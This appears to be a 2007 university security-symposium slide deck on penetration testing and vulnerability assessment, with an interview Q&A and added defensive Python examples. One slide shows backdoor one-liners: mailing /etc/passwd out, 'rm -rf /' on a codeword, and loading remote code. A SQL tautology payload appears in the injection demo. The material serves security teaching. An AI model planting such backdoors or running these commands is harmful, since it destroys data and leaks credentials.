§ But automated tools will have difficulties with the latest technologies:

• AJAX: asynchronous XML requests

• One-time tokens like in Struts, SAP BSP, …

• Thick clients e.g. Java Web Start

• Web services


Outline

§ Penetration testing

§ Vulnerabilities

• Operating System

• Web applications

§ Specific tools

• Campus provided

• Soon to be available


2007 UC Davis IT Security Symposium

Security Process Areas (from INFOSEC Assurance Training & Rating Program)

1. Provide Training

2. Coordinate with Customer Organization

3. Specify Initial INFOSEC Needs

4. Assess Threat

5. Assess Vulnerability

6. Assess Impact

7. Assess INFOSEC Risk 

8. Provide Analysis and Results

9. Manage INFOSEC Assurance Processes


Penetration Testing Process (c/o Core Impact)


Why?

§ To discover vulnerabilities before they do!

§ To meet policy & regulatory standards

§ To gather metrics to justify time and budgets


Regulations

§ Campus CyberSafety

§ SB-1386

§ FERPA

§ HIPAA

• ePHI (electronic Protected Health Information)

§ Payment Card Industry (PCI)

• Data Security Standard

§ Gramm-Leach-Bliley Act (GLBA)

§ Sarbanes-Oxley Act (SOX)


Vulnerabilities cataloged by CERT

[Chart: vulnerabilities identified and cataloged by CERT per year, 1995 through Q1 2007; x-axis: Year; y-axis: Vulnerabilities (0 to 9000)]


SANS Top-20 Internet Security Attack Targets

Operating Systems

W1. Internet Explorer

W2. Windows Libraries

W3. Microsoft Office

W4. Windows Services

W5. Windows Configuration Weaknesses

M1. Mac OS X

U1. UNIX Configuration Weaknesses

Cross-Platform Applications

C1. Web Applications

C2. Database Software

C3. P2P File Sharing Applications

C4. Instant Messaging

C5. Media Players

C6. DNS Servers

C7. Backup Software

C8. Security, Enterprise, and Directory Management Servers

Network Devices

N1. VoIP Servers and Phones

N2. Network and Other Devices Common Configuration Weaknesses

Security Policy and Personnel

H1. Excessive User Rights and Unauthorized Devices

H2. Users (Phishing/Spear Phishing)

Special Section

Z1. Zero Day Attacks and Prevention Strategies


Fyodor’s Top 10 Vulnerability Scanners

§ Nessus

§ GFI LANguard

§ Retina

§ Core Impact

§ ISS Internet Scanner

§ X-scan

§ Sara

§ QualysGuard

§ SAINT

§ MBSA


UC Davis Vulnerability Scanning Tools

§ SelfScan

§ DistAuth

§ Campus Scanning

§ Audit

• Nessus for sysadmins

§ http://security.ucdavis.edu/vuln_resources.cfm


2007 UC Davis IT Security Symposium

Nessus in depth

§ From http://www.tenablesecurity.com/

§ Client - server architecture

§ Language

§ Plugins

• Language

• Credentialed

• “Safe”


Nessus in depth

§ What does this plugin mean to me?

• http://www.nessus.org/plugins/index.php?view=search

• “There are 14944 plugins in the direct feed (1133 in the non-registered GPL feed and 14894 in the registered feed), covering 6902 unique CVE ids and 5603 unique Bugtraq IDs”


Web Application Security

§ http://security.ucdavis.edu/webapp.cfm

§ WebInspect by SPI Dynamics

§ AppScan by Watchfire (IBM)

§ Open Source

• Nikto

• Paros proxy

• WebScarab


WebInspect


Security Analysis Techniques

Find Vulnerabilities Using the Running Application:

• Automated Vulnerability Scanning

• Manual Penetration Testing

Find Vulnerabilities Using the Source Code:

• Automated Static Code Analysis

• Manual Code Review

Combining All Four Techniques is Most Effective


Vulnerability Patterns

    import javax.servlet.http.HttpServletRequest;
    import org.apache.struts.action.ActionForm;

    // Deliberately flawed Struts form from the slide; the patterns called out on the
    // slide are listed below it. The 'session' and 'logger' fields and the UserBean
    // type are assumed to be defined elsewhere in the application.
    public class DamagedStrutsForm extends ActionForm {

        public void doForm(HttpServletRequest request) {
            UserBean u = session.getUserBean();
            // Request values are copied into the bean without any validation.
            u.setName(request.getParameter("name"));
            u.setFavoriteColor(request.getParameter("color"));
        }

        public boolean validate(HttpServletRequest request) {
            try {
                // Blacklist check on the "Name" parameter, while doForm() reads "name".
                if (request.getParameter("Name").indexOf("<scri") != -1) {
                    logger.log("Script detected");
                    return false;
                }
            }
            catch (Exception e) {}   // any exception (e.g. a missing parameter) is swallowed ...
            return true;             // ... and the form is accepted anyway: fail open
        }
    }

Patterns called out on the slide: Failure to Validate (three places), Blacklist Validation, Fail Open, and Time of Check, Time of Use.
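The hardened counterpart below is an added example written in Python (all added examples on this page use Python; the slide's own code is Java), not code from the deck. It reproduces the slide's validate() logic so the fail-open and case-bypass behaviour can be exercised, and sets an allowlist-based, fail-closed binder beside it that validates exactly the values it stores. The allowed colour set, the name pattern and the dict-shaped request are constructed for the illustration.

```python
import re

ALLOWED_COLORS = {"red", "green", "blue"}               # constructed allowlist for the colour field
NAME_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]{0,49}$")   # allowlist: letters plus a few punctuation marks


class ValidationError(ValueError):
    """Raised by the hardened binder; the caller rejects the request."""


def validate_damaged(request):
    """Python rendering of the slide's validate(): a blacklist check on a different key
    ('Name') than the one later stored ('name'), and fail-open on any exception."""
    try:
        if "<scri" in request["Name"]:
            return False
    except Exception:
        pass  # KeyError when 'Name' is absent is swallowed, and the form is accepted
    return True


def bind_form(request):
    """Hardened: validate the very values that will be stored, against allowlists,
    and reject on anything unexpected (fail closed)."""
    try:
        name = request["name"]
        color = request["color"]
    except KeyError as missing:
        raise ValidationError(f"missing parameter {missing}") from None
    if not isinstance(name, str) or not NAME_RE.fullmatch(name):
        raise ValidationError("name contains characters outside the allowed set")
    if color not in ALLOWED_COLORS:
        raise ValidationError("unknown color")
    # Bound once, validated once: no second read of the request that could differ.
    return {"name": name, "favorite_color": color}


def accepted_by_hardened(request):
    try:
        bind_form(request)
        return True
    except ValidationError:
        return False
```

Two requests make the slide's points concrete: one that carries a script tag under `name` but no `Name` key passes `validate_damaged` because the lookup throws and the exception is swallowed, and one that upper-cases the tag slips past the `<scri` blacklist. The allowlist binder rejects both, and a missing parameter or an unknown colour is a rejection rather than a pass.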


What Could a Malicious Developer Do?

§ Trojan Horse runs for admin

    if ( System.getCurrentUser().getName().equals( "admin" ) )
        Runtime.exec( "sendmail [email protected] < /etc/passwd" );

§ Secret trigger removes all files on root partition

    if ( req.getParameter( "codeword" ).equals( "eagle" ) )
        Runtime.exec( "rm –rf /" );

§ Randomly corrupt data one time in 100

    if ( Math.random() < .01 ) bean.setValue( "corrupt" );

§ Load and execute code from remote server

    ((A)(ClassLoader.getSystemClassLoader().defineClass(null, readBytesFromNetwork(), 0, 422).newInstance())).attack();

§ Make backdoor look like inadvertent mistake

    if ( input < 0 ) throw new RuntimeException( "Input error" );

Impossible to tell malicious from mistake. Who wrote the libraries your application uses?


Questionnaire

Vulnerability Assessment and Penetration Testing


Questions And Answers

1) How do you differentiate Vulnerability Scanning and Vulnerability Assessment from Penetration Testing, and why do we do it?

Vulnerability Scanning: The security operation performed on the computer devices to find the vulnerabilities which can make the machines insecure.

Vulnerability Assessment: The process of identifying and quantifying vulnerabilities in a computer system, which involves several phases:

1) Target Selection

2) Vulnerability Scanning and Port Scanning

3) Vulnerability Assessment and Penetration Testing

4) Risk Assessment

5) Problem Management

6) Vulnerability Review

7) Vulnerability Remediation

Penetration Testing: method of evaluating the security of a computer system or network by simulating an attack by a malicious hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of vulnerabilities.


2) How do you define a Risk Assessment?

Assessment of vulnerabilities by running the exploits and verifications to check whether a particular vulnerability really affects the system or is a false positive.

3) How do you differentiate a Risk, Threat and Vulnerability?

Risk: The problem you face from a malicious activity performed on your computer system.

Threat: The entity which is responsible for causing you the risk or problem.

Vulnerability: A loophole that exists on your computer system which can allow a threat to exploit your computer system.

4) What is the difference between Hacking, Cracking and Ethical Hacking?

Hacking: Retrieving the confidential information of the network/computer systems, credentials of a user, etc.

Cracking: Defeating the security devices in a computer network.

Ethical Hacking: a method used to defend against hacking, or the process of mitigating security risks. Ex. Vulnerability Assessment


5) What is a Security Compliance Policy and why should an Organization follow it? Name a few security compliance standards.

A security compliance policy is a set of rules on Information Technology security standards that are supposed to be in place in a network or in a computer system. An organization should follow these security policies for the following reasons:

• To protect company assets (hardware as well as confidential information)

• To gain a competitive advantage

• To comply with regulatory requirements and fiduciary responsibilities

A few security compliance standards are HIPAA

6) What is Hacktivism?

Hacktivism is the act of hacking into a website or computer system in order to communicate a politically or socially motivated message. Unlike a malicious hacker, who may disrupt a system for financial gain or out of a desire to cause harm, the hacktivist performs the same kinds of disruptive actions (such as a DoS attack) in order to draw attention to a cause. For the hacktivist, it is an Internet-enabled way to practice civil disobedience and protest.


7) How do you differentiate Black Box, White Box and Grey Box Testing?

Black Box Testing: Method of assessing/testing the target devices wherein you have no information about the devices you test. Part of this test includes social engineering.

White Box Testing: The analyst has all the information, along with the configuration details, of the target devices he tests. These tests are normally automated tests done by security tools.

Grey Box Testing: You know a few details of the target device, from which the analyst needs to find the other device/network information needed to test.

8) What is Security Auditing?

A security audit is a manual or systematic measurable technical assessment of a system or application. Manual assessments include interviewing staff, performing security vulnerability scans, reviewing application and operating system access controls, and analyzing physical access to the systems. Automated assessments include system-generated audit reports or using software to monitor and report changes to files and settings on a system. Systems can include personal computers, servers, mainframes, network routers, switches. Applications can include Web Services, Microsoft Project Central, Oracle Database.


9) How frequently is the Vulnerability Assessment done and on what factors does the frequency depend?

Vulnerability assessment for a network infrastructure can be done weekly, monthly, quarterly, semi-annually or yearly according to the requirement. The frequency of the scans depends on the device’s exposure to the internet, the volume of the network it handles, its criticality, etc.

10) How many severity levels (Risk Rating) does a Vulnerability have?

Once a scan report is generated, each vulnerability reported will be tagged with one of the severity level ratings Attention (warning), Low, Medium, and High.

11) On what factors does the Risk rating of a Vulnerability depend?

Risk rating depends on several factors:

• Whether the vulnerability can be exploited with ease

• The impact on the system if it is exploited


12) Name a few vulnerability scanners and security tools used for manual testing of vulnerabilities.


13) What is a False Positive finding (vulnerability) and why does the scanner report it?

A vulnerability that does not really exist on a device, but the scanner reports it as a valid finding. The scanner normally detects vulnerabilities based on its plug-ins and the banner versions of the applications running on the target machine. Some vendors, including Red Hat, do not update the banners with the updates, and that is how the false positives arise.

14) What is an Exploit and its Impact?

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.


15) What is a buffer overflow and its types?

A buffer overflow is an anomalous condition where a process attempts to store data beyond the boundaries of a fixed-length buffer. The result is that the extra data overwrites adjacent memory locations. The overwritten data may include other buffers, variables and program flow data, and may cause a process to crash or produce incorrect results. They can be triggered by inputs specifically designed to execute malicious code or to make the program operate in an unintended way. As such, buffer overflows cause many software vulnerabilities and form the basis of many exploits. Sufficient bounds checking by either the programmer, the compiler or the runtime can prevent buffer overflows. There are two different types of buffer overflows that are commonly used:

• Stack based overflow

• Heap based overflow


16) What is cross site scripting?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits.

17) What is Phishing?

Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication. eBay, PayPal and online banks are common targets. Phishing is typically carried out by email or instant messaging, and often directs users to enter details at a website, although phone contact has also been used. Phishing is an example of social engineering techniques used to fool users. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.


18) What is the Mechanism used for SQL Injection?

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user-provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server through the Web application.

Databases are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL, Web applications interact with databases to dynamically build customized data views for each user.
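The mechanism described here, and the "SQL Tautology Injection" example slide earlier in the deck, are both illustrated by the following Python program, which is an added example rather than code from the deck. It builds a constructed in-memory SQLite table of appointment records, queries it once with string concatenation (the chaining of SQL and user input that the answer describes) and once with a bound parameter, and shows what a tautology submitted in place of a date does to each. The table, the records and the function names are constructed for this illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data: a few records that only a date filter is meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE appointments (id INTEGER, patient TEXT, visit_date TEXT)")
    conn.executemany("INSERT INTO appointments VALUES (?, ?, ?)", [
        (1, "A. Patient", "2008-07-30"),
        (2, "B. Patient", "2008-07-31"),
        (3, "C. Patient", "2008-08-01"),
    ])
    return conn


def lookup_vulnerable(conn, visit_date):
    """String concatenation: the user's input becomes part of the SQL grammar,
    so a quote in the input ends the literal and what follows is parsed as SQL."""
    sql = "SELECT id, patient FROM appointments WHERE visit_date = '" + visit_date + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, visit_date):
    """Bound parameter: the input is delivered to the engine as a value, never as SQL,
    so the same string is simply compared against the column and matches nothing."""
    return conn.execute(
        "SELECT id, patient FROM appointments WHERE visit_date = ?", (visit_date,)
    ).fetchall()


# A tautology in place of a date: the vulnerable query becomes
#   WHERE visit_date = 'x' OR '1'='1'
# which is true for every row.
TAUTOLOGY = "x' OR '1'='1"
```

With a valid date both lookups return the single matching record; with the tautology the concatenated query returns every record in the table, while the parameterized query returns none, because no row has that literal string as its date. Parameterization is the fix; validating that the parameter is a well-formed date before it reaches the database is a reasonable second layer.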


19) Explain the TCP packet flow in a normal TCP connect scan and a Stealth Scan.

TCP packets have a header section with a flags field. Flags tell the receiving end something about the type of packet, and thus what the correct response is. The possible flags are SYN (Synchronise), ACK (Acknowledge), FIN (Finished) and RST (Reset). SYN packets include a TCP sequence number, which lets the remote system know what sequence numbers to expect in subsequent communication. ACK acknowledges receipt of a packet or set of packets, FIN is sent when a communication is finished, requesting that the connection be closed, and RST is sent when the connection is to be reset (closed immediately). To initiate a TCP connection, the initiating system sends a SYN packet to the destination, which will respond with a SYN of its own, and an ACK, acknowledging the receipt of the first packet (these are combined into a single SYN/ACK packet). The first system then sends an ACK packet to acknowledge receipt of the SYN/ACK, and data transfer can then begin.

SYN or Stealth scanning makes use of this procedure by sending a SYN packet and looking at the response. If SYN/ACK is sent back, the port is open and the remote end is trying to open a TCP connection. The scanner then sends an RST to tear down the connection before it can be established fully, often preventing the connection attempt appearing in application logs.
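The two exchanges can be played out against a small model of the target's TCP stack. The Python below is an added example, not code from the deck: it models a host that answers SYN on an open port with SYN/ACK, answers a closed port with RST/ACK, and hands a connection to the application (writing an application-log line) only once the client's final ACK arrives. Running a connect scan and a SYN scan against it shows both sides' segments and why only the first one leaves a trace in the application log, while the packet log in front of the host records both. Addresses, port numbers and the `Host`/`Segment` model are constructed for the illustration.

```python
from dataclasses import dataclass, field

FLAG_ORDER = ("SYN", "RST", "FIN", "ACK")  # only for printing labels such as "SYN/ACK"


@dataclass(frozen=True)
class Segment:
    src: str
    dst: str
    port: int
    flags: frozenset
    seq: int = 0
    ack: int = 0

    def label(self):
        return "/".join(f for f in FLAG_ORDER if f in self.flags)


@dataclass
class Host:
    """Constructed model of a target's TCP stack. packet_log is what a firewall or IDS
    in front of the host sees; app_log only records connections that completed the
    handshake, because only those are handed to the listening service."""
    addr: str
    open_ports: set
    packet_log: list = field(default_factory=list)
    app_log: list = field(default_factory=list)
    half_open: dict = field(default_factory=dict)  # port -> peer awaiting its final ACK

    def receive(self, seg):
        self.packet_log.append(seg)
        if seg.flags == {"SYN"}:
            if seg.port in self.open_ports:
                self.half_open[seg.port] = seg.src
                return Segment(self.addr, seg.src, seg.port, frozenset({"SYN", "ACK"}),
                               seq=1000, ack=seg.seq + 1)
            # Closed port: RST/ACK and no state is kept.
            return Segment(self.addr, seg.src, seg.port, frozenset({"RST", "ACK"}), ack=seg.seq + 1)
        if seg.flags == {"ACK"} and self.half_open.get(seg.port) == seg.src:
            del self.half_open[seg.port]
            self.app_log.append(f"accepted connection from {seg.src} on port {seg.port}")
        elif seg.flags & {"RST", "FIN"}:
            self.half_open.pop(seg.port, None)  # the peer tore the attempt down
        return None


def _probe(target, port, src):
    syn = Segment(src, target.addr, port, frozenset({"SYN"}), seq=1)
    reply = target.receive(syn)
    return [syn, reply], reply


def connect_scan(target, port, src="10.0.0.9"):
    """Full three-way handshake (SYN, SYN/ACK, ACK) followed by an orderly close."""
    exchange, reply = _probe(target, port, src)
    if reply.flags != {"SYN", "ACK"}:
        return "closed", exchange
    ack = Segment(src, target.addr, port, frozenset({"ACK"}), seq=2, ack=reply.seq + 1)
    fin = Segment(src, target.addr, port, frozenset({"FIN", "ACK"}), seq=2, ack=reply.seq + 1)
    for seg in (ack, fin):
        exchange.append(seg)
        target.receive(seg)
    return "open", exchange


def syn_scan(target, port, src="10.0.0.9"):
    """Half-open scan: classify the port from the reply to SYN, then send RST instead of ACK."""
    exchange, reply = _probe(target, port, src)
    if reply.flags != {"SYN", "ACK"}:
        return "closed", exchange
    rst = Segment(src, target.addr, port, frozenset({"RST"}), seq=2)
    exchange.append(rst)
    target.receive(rst)
    return "open", exchange


def flag_trace(exchange):
    """Flag labels of the segments in order, e.g. ['SYN', 'SYN/ACK', 'ACK', 'FIN/ACK']."""
    return [seg.label() for seg in exchange]
```

For detection the model makes the trade-off explicit: an application log is blind to half-open probes, so SYN scans are only visible where segments are logged (host firewall, network IDS, flow records), and a run of SYNs answered by SYN/ACK and then reset by the client is the pattern to look for there.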


20) What is a CVE number and its purpose?

§ CVE (Common Vulnerabilities and Exposures) is an online dictionary of registered vulnerabilities. This allows for consistency, as one can refer to a CAN number or CVE number to avoid ambiguity in discussing vulnerabilities. The CAN number represents a vulnerability that is a candidate for inclusion into the list, while a CVE number represents a vulnerability that has been approved by the CVE Editorial Board. When a candidate is approved, the number stays the same but the prefix changes from CAN to CVE.

§ The most common use for a CAN or CVE number is to help distinguish between different vulnerabilities, and avoid addressing the same vulnerability twice under two different descriptions. It is best to acquire a CAN number early in the investigation of a vulnerability.


21) What are the different phases involved in conducting a Vulnerability Assessment?

A vulnerability assessment is carried out in steps, which can vary from one organization to another, or the naming may differ.

• Target selection

• Vulnerability Scanning and Port Scanning

• Vulnerability Assessment and Penetration Testing

• Risk Assessment

• Problem Management

• Vulnerability Review

• Vulnerability Remediation


22) What are Viruses and Trojans and their working mechanisms? How do you detect them?

Viruses: A computer virus is a computer program that can copy itself and infect a computer without the permission or knowledge of the user. The original virus may modify the copies or the copies may modify themselves.

A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or the Internet, or by carrying it on a removable medium such as a floppy disk, CD, or USB drive. Additionally, viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer.

Worms: A computer worm is a self-replicating computer program. It uses a network to send copies of itself to other nodes (computer terminals on the network) and it may do so without any user intervention. Unlike a virus, it does not need to attach itself to an existing program. Worms always harm the network (if only by consuming bandwidth), whereas viruses always infect or corrupt files on a targeted computer.


Trojans: A Trojan horse is a program that installs malicious software while under the guise of doing something else. Though not limited in their payload, Trojan horses are more notorious for installing backdoor programs which allow unauthorized, non-permissible remote access to the victim's machine by unwanted parties, normally with malicious intentions. Unlike a computer virus, a Trojan horse does not propagate by inserting its code into other computer files. The term is derived from the classical myth of the Trojan Horse. Like the mythical Trojan Horse, the malicious code is hidden in a computer program or other computer file which may appear to be useful, interesting, or at the very least harmless to an unsuspecting user. When this computer program or file is executed by the unsuspecting user, the malicious code is also executed, resulting in the set-up or installation of the malicious Trojan horse program.


23) Define Sniffing and Spoofing.

Sniffing: Packet sniffing is a form of wire-tap applied to computer networks instead of phone networks. It came into vogue with Ethernet, which is known as a "shared medium" network. This means that traffic on a segment passes by all hosts attached to that segment. Ethernet cards have a filter that prevents the host machine from seeing traffic addressed to other stations. Sniffing programs turn off the filter, and thus see everyone's traffic. Typical items sniffed include:

§ SMTP, POP, IMAP traffic

• Allows intruder to read the actual e-mail.

§ POP, IMAP, HTTP Basic, Telnet authentication

• Reads passwords off the wire in clear-text.

§ SMB, NFS, FTP traffic

• Reads files off the wire.

§ SQL database

• Reads financial transactions and credit card numbers.


Spoofing: Spoofing is the creation of TCP/IP packets using somebody else's IP address. Routers use the "destination IP" address in order to forward packets through the Internet, but ignore the "source IP" address. That address is only used by the destination machine when it responds back to the source. A common misconception is that "IP spoofing" can be used to hide your IP address while surfing the Internet, chatting on-line, sending e-mail, and so forth. This is generally not true. Forging the source IP address causes the responses to be misdirected, meaning you cannot create a normal network connection. Examples of spoofing:

§ man-in-the-middle - packet sniffs on the link between the two end points, and can therefore pretend to be one end of the connection

§ routing redirect - redirects routing information from the original host to the hacker's host (this is another form of man-in-the-middle attack).

§ source routing - redirects individual packets via the hacker's host

§ blind spoofing - predicts responses from a host, allowing commands to be sent, but can't get immediate feedback.

§ flooding - SYN flood fills up the receive queue from random source addresses; smurf/fraggle spoofs the victim's address, causing everyone to respond to the victim.
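The flooding variant has a recognisable footprint in packet or flow logs: many SYNs to one destination socket that are never completed by the client's ACK, from a large number of different source addresses. The Python below is an added example of detection logic over such records, not code from the deck; the one-line-per-segment log format, the sample log builder and the thresholds are all constructed for the illustration, and the log is assumed to contain the client-to-server direction only.

```python
import re
from collections import defaultdict

# Constructed packet-summary format, one client-to-server TCP segment per line, in the
# style a firewall or IDS might export. Flags: S = SYN, A = ACK, F = FIN, R = RST.
LINE_RE = re.compile(
    r"^t=(?P<t>[\d.]+) src=(?P<src>[\d.]+):(?P<sport>\d+) "
    r"dst=(?P<dst>[\d.]+):(?P<dport>\d+) flags=(?P<flags>[SAFR]+)$"
)


def parse_lines(lines):
    """Yield one record per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield {"t": float(m["t"]), "src": m["src"], "sport": m["sport"],
                   "dst": m["dst"], "dport": m["dport"], "flags": set(m["flags"])}


def half_open_summary(lines):
    """Per destination socket: how many SYNs were never followed by the same client's
    ACK (half-open), and how many distinct source addresses sent them."""
    pending = {}  # (src, sport, dst, dport) -> time of the SYN
    for rec in parse_lines(lines):
        key = (rec["src"], rec["sport"], rec["dst"], rec["dport"])
        if rec["flags"] == {"S"}:
            pending[key] = rec["t"]
        elif rec["flags"] & {"A", "R", "F"}:
            pending.pop(key, None)  # handshake completed or attempt torn down
    summary = defaultdict(lambda: {"half_open": 0, "sources": set()})
    for (src, _sport, dst, dport) in pending:
        entry = summary[f"{dst}:{dport}"]
        entry["half_open"] += 1
        entry["sources"].add(src)
    return {target: (v["half_open"], len(v["sources"])) for target, v in summary.items()}


def detect_syn_flood(lines, min_half_open=20, min_sources=10):
    """Flag destination sockets with many half-open connections from many different
    sources: the signature of a SYN flood using randomised (spoofed) source addresses."""
    return sorted(
        target for target, (half_open, sources) in half_open_summary(lines).items()
        if half_open >= min_half_open and sources >= min_sources
    )


def build_sample_log():
    """Constructed sample: three completed web handshakes, one completed SSH handshake,
    and 40 SYNs to the web port from 40 different addresses that are never completed."""
    lines = []
    t = 0.0
    for i, src in enumerate(("198.51.100.7", "198.51.100.8", "198.51.100.9")):
        lines.append(f"t={t:.3f} src={src}:5{i}000 dst=192.0.2.1:80 flags=S")
        lines.append(f"t={t + 0.02:.3f} src={src}:5{i}000 dst=192.0.2.1:80 flags=A")
        t += 0.1
    lines.append(f"t={t:.3f} src=198.51.100.7:51234 dst=192.0.2.2:22 flags=S")
    lines.append(f"t={t + 0.02:.3f} src=198.51.100.7:51234 dst=192.0.2.2:22 flags=A")
    for i in range(40):
        t += 0.005
        lines.append(f"t={t:.3f} src=203.0.113.{i + 1}:40000 dst=192.0.2.1:80 flags=S")
    return lines
```

On the sample log the web socket shows 40 half-open connections from 40 sources and is flagged, while the completed handshakes contribute nothing. The distinct-source condition is what separates a spoofed flood from a single misbehaving client; the thresholds are placeholders to be set from the normal half-open population of the service being watched.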


Thank you